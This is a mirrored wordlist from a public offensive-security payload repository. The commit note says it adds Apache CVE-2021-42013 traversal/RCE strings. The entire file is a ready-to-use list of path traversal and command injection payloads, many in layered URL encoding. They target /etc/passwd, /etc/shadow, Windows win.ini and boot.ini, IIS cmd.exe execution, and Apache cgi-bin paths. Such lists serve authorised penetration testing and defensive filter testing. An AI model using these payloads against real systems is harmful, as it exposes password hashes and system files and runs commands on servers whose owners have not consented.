mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 23:32:45 +00:00
7e737baa23
Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE into Apache 2.4.49/2.4.50). Also add some depth to the current fuzzing payloads to not miss /cgi-bin directories which are located deeper than 4 subdirectories.
140 lines
8.6 KiB
Text
140 lines
8.6 KiB
Text
\..\WINDOWS\win.ini
|
|
\..\..\WINDOWS\win.ini
|
|
\..\..\..\WINDOWS\win.ini
|
|
\..\..\..\..\WINDOWS\win.ini
|
|
\..\..\..\..\..\WINDOWS\win.ini
|
|
\..\..\..\..\..\..\WINDOWS\win.ini
|
|
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
|
|
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
|
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
|
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
|
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
|
|
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
|
|
../../../../../../../../../etc/passwd
|
|
../../../../../../../../etc/passwd
|
|
../../../../../../../etc/passwd
|
|
../../../../../../etc/passwd
|
|
../../../../../etc/passwd
|
|
../../../../etc/passwd
|
|
../../../etc/passwd
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
|
|
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
|
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
|
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
|
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
|
|
../../../.htaccess
|
|
../../.htaccess
|
|
../.htaccess
|
|
.htaccess
|
|
././.htaccess
|
|
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
|
|
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
|
|
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
|
|
%2e%68%74%61%63%63%65%73%73
|
|
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
|
|
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
|
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
|
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
|
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
|
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
|
|
../../../../../../../../../../../../etc/hosts%00
|
|
../../../../../../../../../../../../etc/hosts
|
|
../../boot.ini
|
|
/../../../../../../../../%2A
|
|
../../../../../../../../../../../../etc/passwd%00
|
|
../../../../../../../../../../../../etc/passwd
|
|
../../../../../../../../../../../../etc/shadow%00
|
|
../../../../../../../../../../../../etc/shadow
|
|
/../../../../../../../../../../etc/passwd^^
|
|
/../../../../../../../../../../etc/shadow^^
|
|
/../../../../../../../../../../etc/passwd
|
|
/../../../../../../../../../../etc/shadow
|
|
/./././././././././././etc/passwd
|
|
/./././././././././././etc/shadow
|
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
|
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
|
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
|
/..\../..\../..\../..\../..\../..\../etc/passwd
|
|
/..\../..\../..\../..\../..\../..\../etc/shadow
|
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
|
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
|
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
|
%0a/bin/cat%20/etc/passwd
|
|
%0a/bin/cat%20/etc/shadow
|
|
%00/etc/passwd%00
|
|
%00/etc/shadow%00
|
|
%00../../../../../../etc/passwd
|
|
%00../../../../../../etc/shadow
|
|
/../../../../../../../../../../../etc/passwd%00.jpg
|
|
/../../../../../../../../../../../etc/passwd%00.html
|
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
|
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
|
\\'/bin/cat%20/etc/passwd\\'
|
|
\\'/bin/cat%20/etc/shadow\\'
|
|
../../../../../../../../conf/server.xml
|
|
/../../../../../../../../bin/id|
|
|
C:/inetpub/wwwroot/global.asa
|
|
C:\inetpub\wwwroot\global.asa
|
|
C:/boot.ini
|
|
C:\boot.ini
|
|
../../../../../../../../../../../../localstart.asp%00
|
|
../../../../../../../../../../../../localstart.asp
|
|
../../../../../../../../../../../../boot.ini%00
|
|
../../../../../../../../../../../../boot.ini
|
|
/./././././././././././boot.ini
|
|
/../../../../../../../../../../../boot.ini%00
|
|
/../../../../../../../../../../../boot.ini
|
|
/..\../..\../..\../..\../..\../..\../boot.ini
|
|
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
|
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
|
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
|
..\..\..\..\..\..\..\..\..\..\boot.ini
|
|
/../../../../../../../../../../../boot.ini%00.html
|
|
/../../../../../../../../../../../boot.ini%00.jpg
|
|
/.../.../.../.../.../
|
|
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
|
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
|
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
|
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|
|
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
|